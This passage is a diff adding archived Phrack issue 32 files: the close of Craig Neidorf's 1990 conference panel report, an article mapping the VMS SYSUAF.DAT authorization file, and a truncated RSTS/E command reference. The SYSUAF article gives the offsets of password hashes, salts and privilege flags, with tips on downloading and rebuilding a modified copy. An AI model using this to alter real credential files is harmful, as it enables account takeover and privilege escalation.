+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+October 4, 1990
+
+Dorothy Denning had gathered the speakers for an early morning brunch and I
+finally got a chance to meet Katie Hafner in person.  The panelists discussed
+some possibilities of discussion questions to start off the presentation and
+before I knew it, it was time to meet the public.
+
+As we gathered in the front of the conference room, I was dismayed to find that
+the people in charge of the setting up the nameboards (that would sit in front
+of each panelist) had attended the Cook school of spelling and labeled me as
+"Neirdorf."  Zenner thought this was hysterical.  Luckily they were able to
+correct the error before we began.
+
+                            Hackers:  Who Are They?
+
+Dr. Denning started the presentation by briefly introducing each panelist and
+asking them a couple of questions.
+
+Katie Hafner disputed the notion that her work has caused a glorification
+of hacking because of the severe hardships the people she interviewed had to
+endure.  I found myself sympathizing with her as I knew what it was like to
+be in their positions.  Many people commented later that her defense of Mitnick
+seemed a little insincere as he had indeed committed some serious acts.  Not
+knowing all of the details surrounding Mitnick's case and not relying on the
+general newsmedia as a basis for opinion I withheld any sort of judgment.
+
+Emmanuel Goldstein and Frank Drake appeared to take on the mantle of being the
+spokespersons for the hackers, although I'm unsure if they would agree with
+this characterization.  Drake's main point of view dealt with the idea that
+young hackers seek to be able to use resources that they are otherwise excluded
+from.  He claimed to once have been a system intruder, but now that he is in
+college and has ample computing resources available to him, he no longer sees a
+need to "hack."
+
+Goldstein on the other hand sought to justify hacking as being beneficial to
+society because the hackers are finding security holes and alerting security to
+fix these problems before something catastrophic occurs.
+
+Gordon Meyer tried to explain the hacker mind-set and how the average hackers
+does not see using corporate resources as having a real financial burden to
+today's companies.  Some people misunderstood his remarks to be speaking from a
+factual position and took offense, stating that the costs are great indeed.
+He also explained the differences between Phrack and the Computer Underground
+Digest.  Most notable is that CuD does not print tutorials about computer
+systems.
+
+Sheldon Zenner focused on the freedom of the speech and press issues.  He also
+spoke about technical details of the U.S. v. Neidorf case and the court rulings
+that resulted from it.  One major point of interest was his quite reasonable
+belief that the courts will soon be holding companies financially liable for
+damages that may occur because of illegal intrusion into their systems.  This
+was not to suggest that a criminal defense strategy could be that a company did
+not do enough to keep an intruder out, but instead that the company could be
+held civilly liable by outside parties.
+
+Zenner and Denning alike discussed the nature of Phrack's articles.  They found
+that the articles appearing in Phrack contained the same types of material
+found publicly in other computer and security magazines, but with one
+significant difference.  The tone of the articles.  An article named "How to
+Hack Unix" in Phrack usually contained very similar information to an article
+you might see in Communications of the ACM only to be named "Securing Unix
+Systems."  But the differences were more extreme than just the titles.  Some
+articles in Phrack seemed to suggest exploiting security holes while the
+Communications of the ACM concentrated more on fixing the problem.  The
+information in both articles would be comparable, but the audiences reading and
+writing these articles were often very different.
+
+I explained the concept and operation of Phrack and wandered into a discussion
+about lack of privacy concerning electronic mail on the Internet from
+government officials, system managers, and possibly even by hackers.  I went on
+to remark that the security professionals were missing the point and the
+problem.  The college and high-school students while perhaps doing some
+exploration and causing some slight disturbances are not the place to be
+focusing their efforts.  The real danger comes from career criminals and
+company insiders who know the systems very well from being a part of it.  These
+people are the source of computer crime in this country and are the ones who
+need to be dealt with.  Catching a teenage hacker may be an easier task, but
+ultimately will change nothing.  To this point I agreed that a hacker gaining
+entry and exposing holes on computer systems may be a service to some degree,
+but unlike Goldstein, I could not maintain that such activity should bring
+prosecutorial immunity to the hacker. This is a matter of discretion for
+security personnel and prosecutors to take into consideration.  I hope they do.
+
+To a large degree I was rather silent on stage.  Perhaps because I was cut off
+more than once or maybe even a little stagefright, but largely because many of
+the questions posed by the audience were wrong on their face for me to answer.
+I was not going to stand and defend hacking for its own sake nor was I there to
+explain the activities of every hacker in existence.
+
+So I let Goldstein and Drake handle questions geared to be answered by a system
+intruder and I primarily only spoke out concerning the First Amendment and
+Phrack distribution.  In one instance a man upset both by Drake's comments
+about how the hackers just want to use resources they can't get elsewhere and
+by Goldstein's presentation of the Operation Sun-Devil raids and the attack on
+"Zod" in New York spoke up and accused us of being viciously one sided.
+
+He said that none of us (and he singled me out specifically) look to be age 14
+(he said he could believe I was 18) and that "our" statement that its ok for
+hackers to gain access to systems simply because they lacked the resources
+elsewhere meant it was ok for kids to steal money to buy drugs.
+
+I responded by asking him if he was suggesting that if these "kids" were rich
+and did not steal the money, it would be ok to purchase drugs?  I was sure that
+it was just a bad analogy so I changed the topic afterwards.  He was right to a
+certain extent, all of the hackers are not age 14 or even in highschool or
+college, but is this really all that important of a distinction?
+
+The activities of the Secret Service agents and other law enforcement officials
+in Operation Sun-Devil and other investigations have been overwhelming and very
+careless.  True this is just their standard way of doing business and they may
+not have even singled out the hackers as a group to focus excess zeal, but
+recognizing that the hackers are in a worst case scenario "white-collar
+offenders," shouldn't they alter their technique?  Something that might be
+important to make clear is that in truth my indictment and the indictments on
+members of the Legion of Doom in Atlanta had absolutely nothing to do with
+Operation Sun-Devil despite the general media creation.
+
+Another interesting point that was brought out at the convention was that there
+was so much activity and the Secret Service kept so busy in the state of
+Arizona (possibly by some state official) concerning the hacker "problem" that
+perhaps this is the reason the government did not catch on to the great Savings
+& Loan multi-Billion dollar loss.
+
+One gentleman spoke about his son being in a hospital where all his treatments
+were being run by computer.  He added that a system intruder might quite by
+accident disrupt the system inadvertently endangering his son's life.  Isn't
+this bad?  Obviously yes it is bad, but what was worse is that a critical
+hospital computer system would be hooked up to a phoneline anyway.  The main
+reason for treatment in a hospital is so that the doctors are *there* to
+monitor and assist patients.  Could you imagine a doctor dialing in from home
+with a modem to make his rounds?
+
+There was some discussion about an editor's responsibility to inform
+corporations if a hacker were to drop off material that he/she had breached
+their security.  I was not entirely in opposition to the idea, but the way I
+would propose to do it was probably in the pages of a news article.  This may
+seem a little roundabout, but when you stop and consider all of the private
+security consultants out there, they do not run around providing information to
+corporations for free.  They charge enormous fees for their services.  There
+are some organizations that do perform services for free (CERT comes to mind),
+but that is the reason they were established and they receive funding from the
+government which allows them to be more generous.
+
+It is my belief that if a hacker were to give me some tips about security holes
+and I in turn reported this information to a potential victim corporation, the
+corporation would be more concerned with how and from whom I got the
+information than with fixing the problem.
+
+One of the government's expert witnesses from U.S. v. Neidorf attended this
+session and he prodded Zenner and I with questions about the First Amendment
+that were not made clear from the trial.  Zenner did an excellent job of
+clarifying the issues and presenting the truth where this Bellcore employee
+sought to show us in a poor light.
+
+During the commentary on the First Amendment, Hafner, Zenner, and I discussed a
+July 22, 1988 article containing a Pacific Bell telephone document copied by a
+hacker and sent to John Markoff that appeared on the front page of the New York
+Times.  A member of the audience said that this was ok, but the Phrack article
+containing the E911 material was not because Phrack was only sent to hackers.
+Zenner went on to explain that this was far from true since private security,
+government employees, legal scholars, reporters, and telecom security personnel
+all received Phrack without discrimination.  There really is a lot that both
+the hackers and security professionals have to learn about each other.
+
+It began to get late and we were forced to end our session.  I guess what
+surprised me the most were all of the people that stayed behind to speak with
+us.  There were representatives from NASA, U.S. Sprint, Ford Aerospace, the
+Department of Defense, a United States Army Lt. Colonel who all thanked us
+for coming to speak.  It was a truly unique experience in that a year ago I
+would have presumed these people to be fighting against me and now it seems
+that they are reasonable, decent people, with an interest in trying to learn
+and help end the problems.  I also met Mrs. Gail Meyer for the first time in
+person as well.
+
+I was swamped with people asking me how they could get Phrack and for the most
+part I referred them to Gordon Meyer and CuD (and the CuD ftp).  Just before we
+went to lunch I met Donn Parker and Art Brodsky, an editor from Communications
+Daily.  So many interesting people to speak with and so little time.  I spent a
+couple hours at the National Gallery of Art with Emmanuel Goldstein, flew back
+to St. Louis, and returned to school.
+
+It was definitely an enLightening experience.
+
+++++++++++++++++++++++++++++++
+
+A very special thank you goes to Dorothy Denning, a dear friend who made it
+possible for me to attend the conference.
+
+:Craig M. Neidorf a/k/a Knight Lightning
+
+ C483307 @ UMCVMB.MISSOURI.EDU
+ C483307 @ UMCVMB.BITNET
+_______________________________________________________________________________
diff --git a/phrack32/8.txt b/phrack32/8.txt
new file mode 100644
index 0000000..e0ca7ed
--- /dev/null
+++ b/phrack32/8.txt
@@ -0,0 +1,398 @@
+                              ==Phrack Classic==
+
+                     Volume Three, Issue 32, File #8 of 12
+
+
+                       +-------------------------------+
+                       | Inside the SYSUAF.DAT file of |
+                       +-------------------------------+
+
+           +------------------------------------------------------+
+           | Digital Equipment Corporation's VMS Operating System |
+           +------------------------------------------------------+
+
+                                   -= by =-
+
+                         -----:>  Pain Hertz  <:----
+
+
+
+Overview
+~~~~~~~
+        In this file, I will explain what the System User Authorization File
+is, what information it contains, what the logical and physical characteristics
+of the file are, and how one can manipulate it to reveal and/or modify its
+contents.
+
+Background
+~~~~~~~~
+        The Virtual Memory System (VMS) Operating System's System User
+Authorization File (SYSUAF) contains the information that determines a given
+user's username, password(s), security priviledges, as well as many other
+similar data which either allow or disallow the user to have the system
+perform certain tasks.
+
+Characteristics
+~~~~~~~~~~~~~~
+        The SYSUAF.DAT file (UAF) is usually located on the system on the
+device pointed to by the logical SYS$COMMON, and under the [SYSEXE]
+subdirectory.  However, if the logical SYSUAF exists, it will point to the
+location and name of the UAF.
+
+        The UAF is a binary, indexed data file.  It's indexed on 4 keys:
+username, UIC, extended user identifier, and owner identifier.  Using
+the VMS ANALYZE utility reveals the following about the UAF:
+
+
+IDENT   "01-JAN-1990 13:13:13   VAX/VMS ANALYZE/RMS_FILE Utility"
+
+SYSTEM
+        SOURCE                  VAX/VMS
+
+FILE
+        ALLOCATION              24
+        BEST_TRY_CONTIGUOUS     yes
+        BUCKET_SIZE             3
+        CLUSTER_SIZE            3
+        CONTIGUOUS              no
+        EXTENSION               3
+        FILE_MONITORING         no
+        GLOBAL_BUFFER_COUNT     0
+        NAME                    "SYS$COMMON:[SYSEXE]SYSUAF.DAT;1"
+        ORGANIZATION            indexed
+        OWNER                   [SYSTEM]
+        PROTECTION              (system:RWED, owner:RWED, group:RWED, world:RE)
+
+RECORD
+        BLOCK_SPAN              yes
+        CARRIAGE_CONTROL        none
+        FORMAT                  variable
+        SIZE                    1412
+
+AREA 0
+        ALLOCATION              9
+        BEST_TRY_CONTIGUOUS     yes
+        BUCKET_SIZE             3
+        EXTENSION               3
+
+AREA 1
+        ALLOCATION              3
+        BUCKET_SIZE             3
+        EXTENSION               3
+
+AREA 2
+        ALLOCATION              12
+        BUCKET_SIZE             2
+        EXTENSION               12
+
+KEY 0
+        CHANGES                 no
+        DATA_KEY_COMPRESSION    yes
+        DATA_RECORD_COMPRESSION yes
+        DATA_AREA               0
+        DATA_FILL               100
+        DUPLICATES              no
+        INDEX_AREA              1
+        INDEX_COMPRESSION       yes
+        INDEX_FILL              100
+        LEVEL1_INDEX_AREA       1
+        NAME                    "Username"
+        NULL_KEY                no
+        PROLOG                  3
+        SEG0_LENGTH             32
+        SEG0_POSITION           4
+        TYPE                    string
+
+KEY 1
+        CHANGES                 yes
+        DATA_KEY_COMPRESSION    no
+        DATA_AREA               2
+        DATA_FILL               100
+        DUPLICATES              yes
+        INDEX_AREA              2
+        INDEX_COMPRESSION       no
+        INDEX_FILL              100
+        LEVEL1_INDEX_AREA       2
+        NAME                    "UIC"
+        NULL_KEY                no
+        SEG0_LENGTH             4
+        SEG0_POSITION           36
+        TYPE                    bin4
+
+KEY 2
+        CHANGES                 yes
+        DATA_KEY_COMPRESSION    no
+        DATA_AREA               2
+        DATA_FILL               100
+        DUPLICATES              yes
+        INDEX_AREA              2
+        INDEX_COMPRESSION       no
+        INDEX_FILL              100
+        LEVEL1_INDEX_AREA       2
+        NAME                    "Extended User Identifier"
+        NULL_KEY                no
+        SEG0_LENGTH             8
+        SEG0_POSITION           36
+        TYPE                    bin8
+
+KEY 3
+        CHANGES                 yes
+        DATA_KEY_COMPRESSION    no
+        DATA_AREA               2
+        DATA_FILL               100
+        DUPLICATES              yes
+        INDEX_AREA              2
+        INDEX_COMPRESSION       no
+        INDEX_FILL              100
+        LEVEL1_INDEX_AREA       2
+        NAME                    "Owner Identifier"
+        NULL_KEY                yes
+        NULL_VALUE              0
+        SEG0_LENGTH             8
+        SEG0_POSITION           44
+        TYPE                    bin8
+
+ANALYSIS_OF_AREA 0
+        RECLAIMED_SPACE         0
+
+ANALYSIS_OF_AREA 1
+        RECLAIMED_SPACE         0
+
+ANALYSIS_OF_AREA 2
+        RECLAIMED_SPACE         0
+
+ANALYSIS_OF_KEY 0
+        DATA_FILL               71
+        DATA_KEY_COMPRESSION    75
+        DATA_RECORD_COMPRESSION 67
+        DATA_RECORD_COUNT       5
+        DATA_SPACE_OCCUPIED     3
+        DEPTH                   1
+        INDEX_COMPRESSION       85
+        INDEX_FILL              1
+        INDEX_SPACE_OCCUPIED    3
+        LEVEL1_RECORD_COUNT     1
+        MEAN_DATA_LENGTH        644
+        MEAN_INDEX_LENGTH       34
+
+ANALYSIS_OF_KEY 1
+        DATA_FILL               7
+        DATA_KEY_COMPRESSION    0
+        DATA_RECORD_COUNT       4
+        DATA_SPACE_OCCUPIED     2
+        DEPTH                   1
+        DUPLICATES_PER_SIDR     0
+        INDEX_COMPRESSION       0
+        INDEX_FILL              2
+        INDEX_SPACE_OCCUPIED    2
+        LEVEL1_RECORD_COUNT     1
+        MEAN_DATA_LENGTH        15
+        MEAN_INDEX_LENGTH       6
+
+ANALYSIS_OF_KEY 2
+        DATA_FILL               8
+        DATA_KEY_COMPRESSION    0
+        DATA_RECORD_COUNT       4
+        DATA_SPACE_OCCUPIED     2
+        DEPTH                   1
+        DUPLICATES_PER_SIDR     0
+        INDEX_COMPRESSION       0
+        INDEX_FILL              2
+        INDEX_SPACE_OCCUPIED    2
+        LEVEL1_RECORD_COUNT     1
+        MEAN_DATA_LENGTH        19
+        MEAN_INDEX_LENGTH       10
+
+ANALYSIS_OF_KEY 3
+        ! This index is uninitialized - there are no records.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Examination
+~~~~~~~~~
+
+        Generally, an interactive user would use the AUTHORIZE utility to
+modify or examine the UAF, while a program would use the $GETUAI system
+services (get user authorization information service) to examine the file.
+The $GETUAI system services reference provide an excellent description of what
+fields the UAF contains, and how many bytes are used within the file to store
+each of those fields.  However, it may not be within your realm of skills to
+program using system services.  It would probably be considerably easier to
+use a sector editor/browser to locate values within the UAF.  You could use a
+sector editor/browser online (such as VFE.EXE), or you you might choose to
+download the UAF and use an editor/browse for your personal computer.
+Regardless of which method you choose, you will have to know the offset of
+each field within the user authorization file.  This is what I have provided
+for you.
+
+        The contents of the UAF under VMS release 5.3-1 are as follows:
+
+Offset   Description                                            Length
+-----------------------------------------------------------------------------
+   0     Record Header                                             4
+   4     Username (loginid)                                       32
+  36     Member UIC - Mem UIC decimal   1 = 0100                   2
+                      Mem UIC decimal  10 = 0A00
+                      Mem UIC decimal 256 = FF01
+
+  38     Group UIC  - Same as format as member UIC                 2
+
+         Note:  UICs as displayed in the VMS environment
+         are OCTAL.  A UIC of [010,001] would be saved as
+         '01000800' in bytes 36-39 (offset).
+
+  40     Nulls                                                    12
+  52     Account name                                             32
+  84     1 byte - value = length of owner                          1
+  85     Owner                                                    31
+ 116     1 byte - value = length of device                         1
+ 117     Device (default disk device)                             31
+ 148     1 byte - length of default (SYS$LOGIN) directory          1
+ 149     Default (SYS$LOGIN) directory name                       63
+ 212     1 byte - length of default login command file             1
+ 213     Default login command file                               63
+ 276     1 byte - length of default CLI                            1
+ 277     Default command language interpeter                      31
+
+         Note: CLI is assumed to be in SYS$SYSTEM directory
+         and have an .EXE extension.
+
+ 308     1 byte - length of user defined CLI tables                1
+ 309     User defined CLI table name                              31
+ 340     Encrypted primary password                                8
+ 348     Encrypted secondary password                              8
+ 356     Number of login fails                                     2
+ 358     Password encryption salt                                  2
+ 360     Encryption algorithm code byte - primary password         1
+ 361     Encryption algorithm code byte - secondary password       1
+ 362     Password minimum length                                   1
+ 363     Filler (1 byte)                                           1
+ 364     Account expiration date                                   8
+ 372     Password lifetime                                         8
+ 380     Password change date/time - primary password              8
+ 388     Password change date/time - secondary password            8
+ 396     Last interactive login date/time                          8
+ 404     Last non-interactive login date/time                      8
+ 412     Authorize priviledges                                     8
+ 420     Default priviledges                                       8
+ 428     Filler (40 bytes)                                        40
+
+ 468     Login Flags bits as follows:                              4
+
+           7  6  5  4  3  2  1  0
+         -------------------------
+         |  |  |  |  |  |  |  |  |
+         -------------------------
+
+         Byte Offset 468:
+
+         Bit 0            - User can not use CTRL-Y
+         Bit 1            - User is restricted to default
+                            command interpeter
+         Bit 2            - SET PASSWORD command is disabled
+         Bit 3            - Prevent user from changing any
+                            defaults at login
+         Bit 4            - User account is disabled
+         Bit 5            - User will not receive the login
+                            welcome message
+         Bit 6            - Announcement of new mail is suppressed
+         Bit 7            - Mail delivery to user is disabled
+
+         Byte Offset 469:
+
+         Bit 0            - User is required to use generated
+                            passwords
+         Bit 1            - Primary password is expired
+         Bit 2            - Secondary password is expired
+         Bit 3            - All actions are audited
+         Bit 4            - User will not receive last login
+                            messages
+         Bit 5            - User can not reconnect to existing
+                            processes
+         Bit 6            - User can only login to terminals
+                            defined by the automatic login
+                            facility (ALF)
+         Bit 7            - User is required to change expired
+                            passwords
+
+         Byte Offset 470:
+
+         Bit 0            - User is restricted to captive account
+         Bit 1            - Prevent user from executing RUN, MCR
+                            commands, or foreign commands at the
+                            DCL level
+         Bits 2-7         - Reserved for future use
+
+         Byte Offset 471:
+
+         Bits 0-7         - Reserved for future use
+
+
+         Note On Access Bytes:
+
+         Each bit set represents a 1-hour period, from bit 0 as
+         midnight to 1 a.m. to bit 23 as 11 p.m. to midnight.
+
+ 472     Network access bytes - primary days                       3
+ 475     Network access bytes - seconday days                      3
+ 478     Batch access bytes - primary days                         3
+ 481     Batch access bytes - seconday days                        3
+ 484     Local access bytes - primary days                         3
+ 487     Local access bytes - seconday days                        3
+ 490     Dialup access bytes - primary days                        3
+ 493     Dialup access bytes - secondary days                      3
+ 496     Remote access bytes - primary days                        3
+ 499     Remote access bytes - seconday days                       3
+
+ 502     Filler (12 bytes)                                        12
+ 514     Prime days                                                1
+
+         Bits 0-7 toggled on represents primedays, respective
+         to Mon, Tue, ..., Sun.
+
+ 515     Filler (1 byte)                                           1
+ 516     Default base priority                                     1
+ 517     Maximum job queue priority                                1
+ 518     Active process limit                                      2
+ 520     Max. number of interactive, detached, and batch jobs      2
+ 524     Detached process limit                                    2
+ 526     Subprocess creation limit                                 2
+ 528     Buffered I/O count                                        2
+ 530     Timer queue entry limit                                   2
+ 532     AST queue limit                                           2
+ 534     Lock queue limit                                          2
+ 536     Open file limit                                           4
+ 538     Shared file limit                                         2
+ 540     Working set quota                                         4
+ 548     Working set extent                                        4
+ 552     Paging file quota                                         4
+ 556     Maximum CPU time limit (in 10-milliseconds)               4
+ 560     Buffered I/O byte limit                                   4
+ 564     Paged buffer I/O byte count limit                         4
+ 568     Initial byte quota (jobwide logical name table uses)      4
+ 572     Filler (72 bytes)                                        72
+
+        Dates and times are stored as 8 bytes representing the number of
+seconds elapsed since November 17, 1858, 12:00:00 a.m.
+
+        Earlier versions of the VMS UAF will contain much of the same data,
+which should be at the same offset as listed above.
+
+
+        Should you decide to attempt to modify the SYSUAF.DAT file, keep in
+mind that if you download the file, when you upload it, it will not be the
+same as it was before; it will not be an indexed file.  You *might* be able
+to create an .FDL file (using ANALYZE/RMS/FDL SYSUAF.DAT), and use that .FDL
+file to convert it back to an indexed file
+(with CONVERT/FDL=SYSUAF.FDL UPLOAD_UAF.DAT NEW_UAF.DAT), but chances that it
+will contain the proper indexing and file attributes are slim.  Remember when
+altering the SYSUAF.DAT file to keep a copy around (on the system) in case
+you need to repair the damage.
+
+
+-PHz
+
+Feel free to make any comments or corrections to the following address:
+
+[phz@judy.indstate.edu]
+_______________________________________________________________________________
diff --git a/phrack32/9.txt b/phrack32/9.txt
new file mode 100644
index 0000000..f8086f6
--- /dev/null
+++ b/phrack32/9.txt
@@ -0,0 +1,986 @@
+                              ==Phrack Classic==
+
+                     Volume Three, Issue 32, File #9 of 12
+
+
+                          /-?!?!?!?!?!?!?!?!?!?!?!-\
+                         /EZ?!                  ?!AH\
+                        /APE?!                  ?!ZAP\
+                       /AZHP?!      RSTS/E      ?!EZHA\
+                      / ZEAH?!                  ?!PEAZ \
+                 [*>RSTS PZA?!        by        ?!HPZ LIVES<*]
+                      \ PHEZ?!                  ?!AHEE /
+                       \HAPE?!   Crimson Death  ?!ZAPP/
+                        \ZHP?!                  ?!EZH/
+                         \AH?!                  ?!PE/
+                          \-?!?!?!?!?!?!?!?!?!?!?!-/
+
+
+Ok, ok... Just what you wanted... a file of RSTS!!! Hah...
+Well.. One would be suprised on how many RSTS systems are still around
+on variuos X.25 networks, not to mention they are soooo much fun!
+Here is a little list of some various commands that is good to keep
+lying around just to use as a reference of just for you nostaglic type
+people like me.  So enjoy, and if you were never involved in hacking
+when RSTS was popular, you really missed something.
+-------------------------------------------------------------------------------
+
+*ALLOCATE
+The ALLOCATE command reserves a physical device for your use during
+the current session and optionally establishes a logical name for
+the device. Once a device has been allocated, other users cannot access
+the device until you specifically deallocate it or log out.  You can
+allocate a device only when it is not allocated by another job.
+
+Format
+
+ALLOCATE device-name[:] [logical-name[:]]
+
+Prompts
+
+Device: device-name
+
+See also:  ASSIGN, DEALLOCATE
+
+*APPEND
+The APPEND command adds the contents of one or more files to the end
+of the file you specify. APPEND is similar in syntax and function to
+the COPY command.
+
+Format
+
+APPEND [node::]input-file-spec[,...]  [node::]output-file-spec
+
+Command Qualifiers                  Defaults
+
+   /[NO]LOG                         /LOG
+   /[NO]QUERY                       /NOQUERY
+
+Prompts
+
+From: input-file-spec[,...]
+
+To: output-file-spec
+
+See also:  COPY
+
+*ASSIGN
+The ASSIGN command lets you relate a logical name to a directory
+or to a physical device.  The names you ASSIGN stay in effect until
+you log out, or log into another account or until you DEASSIGN the name.
+
+Format
+
+ASSIGN device-name:[[ppn]] logical-name[:]
+
+Prompts
+
+Device: device-name:[[ppn]]
+
+Logical name: logical-name[:]
+
+*BASIC
+The BASIC command invokes the BASIC-PLUS or BASIC-PLUS-2 programming
+environment, depending on the qualifiers you use and the system's
+default. It also prepares RSTS/E for the development of BASIC programs.
+
+Format
+
+BASIC
+
+Command Qualifiers                  Comments
+
+   /BP2                             Invokes the BASIC-PLUS-2
+                                    programming environment
+   /BPLUS                           Invokes the BASIC-PLUS
+                                    programming environment
+
+All subsequent commands are interpreted as BASIC programming commands,
+until you type the following command to return to the DCL keyboard
+monitor:  DCL <ret>
+
+*CCL
+Format
+
+CCL ccl-command
+
+The Concise Command Language (CCL) allows you to enter a command name
+rather than type RUN and a program name.
+
+You can type CCL commands directly after DCL's dollar prompt ($).
+The format of the CCL command is defined by your system manager.
+For details about the use of a CCL command, refer to the
+documentation written for your site.
+
+When you are using the DCL Keyboard Monitor, DCL commands take
+precedence over CCL commands.  If your system manager gives a CCL
+command the same name as a DCL command, you must type the prefix
+"CCL" a space, and the CCL command itself.
+
+For example, a CCL command name "DIRECTORY" and the DCL command
+"DIRECTORY" may produce different results depending on how the CCL
+command works at your site.  To use the CCL version, type:
+    $  CCL DIRECTORY <ret>
+
+*COBOL
+The COBOL command compiles a COBOL-81 program.  (Only one source file at a
+time can be compiled with COBOL-81.)
+
+
+Format:
+
+COBOL file-spec
+
+Qualifiers                        Defaults
+
+   /[NO]ANSI_FORMAT
+   /[NO]CHECK
+   /[NO]CROSS_REFERENCE
+   /LIST[=listfile]               /NOLIST
+   /NOLIST
+   /[NO]MAP
+   /NAMES=aa                      /NAMES=SC
+   /OBJECT[=objfile]              /OBJECT
+   /NOOBJECT
+
+Prompts
+
+File:  file-spec
+
+See also:  LINK
+
+*COPY
+The COPY command duplicates one or more existing files.
+You can use COPY to:
+
+- copy one file to another file
+- merge (concatenate) more than one file into a single file
+- copy a group of files to another group of files
+
+Format
+
+COPY [node::]input-file-spec[,...]  [node::]output-file-spec
+
+Qualifiers                          Defaults
+
+   /ALLOCATION=n
+   /[NO]CONTIGUOUS       (N)
+   /[NO]LOG              (N)        /LOG
+   /[NO]OVERLAY                     /NOOVERLAY
+   /PROTECTION=n
+   /[NO]QUERY            (N)        /NOQUERY
+   /[NO]REPLACE          (N)        /NOREPLACE
+
+(N) denotes a qualifier that you can use in network operations.
+
+Prompts
+
+From: input-file-spec[,...]
+
+To: output-file-spec
+
+*CREATE
+The CREATE command allows you to enter text and save it as a file.
+
+Format
+
+CREATE file-spec
+
+Prompts
+
+File: file-spec
+
+Once you have entered the file-spec, press RETURN and you may start
+typing text.  Press <CTRL/Z> when you have finished entering text.
+
+Command Qualifiers
+
+   /ALLOCATION=n
+   /[NO]CONTIGUOUS
+   /PROTECTION=n
+   /[NO]REPLACE
+
+See also:  EDIT
+
+*DEALLOCATE
+The DEALLOCATE command releases a device that you reserved for private
+use, so that other users may have access to it. (However, DEALLOCATE
+does not deassign any logical name you may have set up for the device.)
+
+Format
+
+DEALLOCATE device-name[:]
+
+Command Qualifiers                  Defaults
+
+   /ALL                             none
+
+Prompts
+
+Device: device-name[:]
+
+See also:  ALLOCATE
+
+*DEASSIGN
+The DEASSIGN command cancels logical name assignments you made with
+the ASSIGN or ALLOCATE commands.
+
+Format
+
+DEASSIGN [logical-name[:]]
+
+Command Qualifiers                  Defaults
+
+   /ALL
+
+Prompts
+
+Logical name: logical-name[:]
+
+See also:  ASSIGN, DEALLOCATE
+
+*DELETE/ENTRY
+The DELETE/ENTRY command deletes jobs from the queue that have not
+yet begun processing or jobs that are currently being processed.
+
+Format
+
+DELETE/ENTRY=job-number [queue-name[:]]
+
+Command Qualifiers                  Defaults
+
+   /BATCH
+
+Prompts
+
+Queue: queue-name[:]
+
+If you do not specify a queue name, LP0: is assumed.
+
+See also:  PRINT, SUBMIT, DELETE/JOB, SET QUEUE/ENTRY
+
+*DELETE/JOB
+
+The DELETE/JOB command uses the name of a job to cancel a request
+to the print or batch queue.
+
+Format
+
+DELETE/JOB=job-name [queue-name[:]]
+
+Command Qualifiers                  Defaults
+
+   /BATCH
+
+For example, if you decide after you make your print request that you
+do not want a hard copy of the file after all, you can use the
+DELETE/JOB command to withdraw your request.  (If the file is printed
+before you enter the DELETE/JOB command, your request is too late.
+However, it works if your file is in the middle of printing: the file
+stops printing.)
+
+See also:  PRINT, SUBMIT, DELETE/ENTRY, SET QUEUE/JOB
+
+*DELETE
+The DELETE command permanently removes a file from your account.
+
+Format
+
+DELETE [node::]file-spec[,...]
+
+Command Qualifiers                 Defaults
+
+   /BEFORE=date
+   /CREATED                        /CREATED
+   /[NO]LOG                        /LOG
+   /MODIFIED
+   /[NO]QUERY                      /NOQUERY
+   /SINCE=date
+
+Prompts
+
+File: [node::]file-spec[,...]
+
+*DIBOL
+
+The DIBOL command compiles a DIBOL-11 program.  You can include up to
+six source file specifications to be compiled into a single object
+file with the DIBOL compiler.
+
+Format
+
+DIBOL filespec[,...]
+
+File Qualifiers                  Defaults
+
+   /LIST[=listfile]              /NOLIST
+   /NOLIST
+   /OBJECT[=objfile]             /OBJECT
+   /NOOBJECT
+   /WARNINGS                     /WARNINGS
+   /NOWARNINGS
+
+See also:  LINK
+
+*DIFFERENCES
+The DIFFERENCES command compares two files and lists any sections
+of text that differ between the two files.
+
+Format
+
+DIFFERENCES input-file-spec  compare-file-spec
+
+Command Qualifiers                  Defaults
+
+   /IGNORE=BLANKLINES
+   /MATCH=size                      /MATCH=3
+   /MAXIMUM_DIFFERENCES=n
+   /OUTPUT[=file-spec]
+
+Prompts:
+
+File 1: input-file-spec
+
+File 2: compare-file-spec
+
+*DIRECTORY
+The DIRECTORY command displays information about files.
+Use the TYPE command to display the contents of individual files.
+
+Format
+
+DIRECTORY [node::][file-spec[,...]]
+
+Command Qualifiers                  Defaults
+
+   /BEFORE=date
+   /BRIEF                           /BRIEF
+   /CREATED                         /CREATED
+   /DATE[=CREATED]                  /NODATE
+        [=MODIFIED]
+        [=ALL]
+   /NODATE
+   /FULL                            /BRIEF
+   /MODIFIED                        /CREATED
+   /OUTPUT=outfile
+   /[NO]PROTECTION                  /PROTECTION
+   /SINCE=date
+   /SIZE[=ALLOCATION]               /SIZE=USED
+        [=USED]
+   /NOSIZE
+   /TOTAL
+
+
+*DISMOUNT
+Releases a disk or tape previously accessed with a MOUNT command.
+You issue this command before you take the drive off line, or before
+you physically dismount the tape or disk.
+
+The DISMOUNT command deallocates the device if it was allocated to
+you.  (On some systems, dismounting a disk requires privileges.)
+You cannot DISMOUNT a device if there are open files on it.  If you
+try, RSTS/E displays the message:
+
+?Account or device in use
+
+Format
+
+DISMOUNT  device-name[:] [label]
+
+Prompts
+
+Device:  device-name[:]
+
+See also:  MOUNT, DEALLOCATE
+
+*EDIT
+The EDIT command starts the EDT editor program, which lets
+you create and edit text files.
+
+Format
+
+EDIT file-spec
+
+Command Qualifiers                  Defaults
+
+   /COMMAND[=file-spec]             /COMMAND=EDTINI.EDT
+   /NOCOMMAND                       /COMMAND=EDTINI.EDT
+   /JOURNAL[=file-spec]             /JOURNAL
+   /NOJOURNAL                       /JOURNAL
+   /OUTPUT[=outfile]                /OUTPUT
+   /NOOUTPUT                        /OUTPUT
+   /[NO]READ_ONLY                   /NOREAD_ONLY
+   /[NO]RECOVER                     /NORECOVER
+   /EDT                             /EDT
+
+Prompts
+
+File: file-spec
+
+*FORTRAN
+The FORTRAN command compiles up to six FORTRAN source files into
+a single object file.
+
+There are three FORTRAN compilers available on RSTS/E:
+
+  Command               Invokes
+
+FORTRAN/FOR            FORTRAN-IV
+FORTRAN/F4P            FORTRAN-IV-PLUS
+FORTRAN/F77            FORTRAN-77
+
+FORTRAN/F77 is the default, unless your system manager has changed it.
+
+Qualifiers which you may use with FORTRAN-IV are as follows:
+
+Format
+
+FORTRAN/FOR file-spec[,...]
+
+Command Qualifiers
+
+   /CODE:EAE
+         EIS
+         FIS
+         THR
